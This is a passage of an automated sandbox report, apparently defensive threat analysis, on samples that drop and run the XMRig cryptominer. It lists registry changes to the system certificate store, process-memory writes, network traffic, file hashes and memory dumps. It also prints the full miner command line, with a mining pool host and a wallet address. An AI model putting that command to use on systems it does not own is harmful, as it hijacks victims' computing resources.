memory/2800-68-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-69-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-70-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-71-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-72-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-73-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-74-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-75-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-76-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-77-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-78-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-79-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-80-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-81-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-82-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-83-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-84-0x00007FF778020000-0x00007FF778B23000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:49
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4148 wrote to memory of 8 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4148 wrote to memory of 8 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.111.78.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/8-16-0x000002931C6C0000-0x000002931C6E0000-memory.dmp
memory/8-17-0x00000293AEA70000-0x00000293AEA90000-memory.dmp
memory/8-18-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-19-0x00000293AEEB0000-0x00000293AEED0000-memory.dmp
memory/8-20-0x00000293AF0E0000-0x00000293AF100000-memory.dmp
memory/8-21-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-22-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-25-0x00000293AF0E0000-0x00000293AF100000-memory.dmp
memory/8-24-0x00000293AEEB0000-0x00000293AEED0000-memory.dmp
memory/8-23-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-26-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-27-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-28-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-29-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-30-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-31-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-32-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-33-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-34-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-35-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-36-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-37-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-38-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-39-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-40-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-41-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-42-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-43-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-44-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-45-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-46-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-47-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-48-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-49-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-50-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-51-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-52-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-53-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-54-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-55-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-56-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-57-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-58-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-59-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-60-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-61-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-62-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-63-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-64-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-65-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-66-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-67-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-68-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-69-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-70-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-71-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-72-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-73-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-74-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-75-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-76-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-77-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-78-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-79-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-80-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-81-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-82-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-83-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
memory/8-84-0x00007FF6BB3A0000-0x00007FF6BBEA3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:50
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | 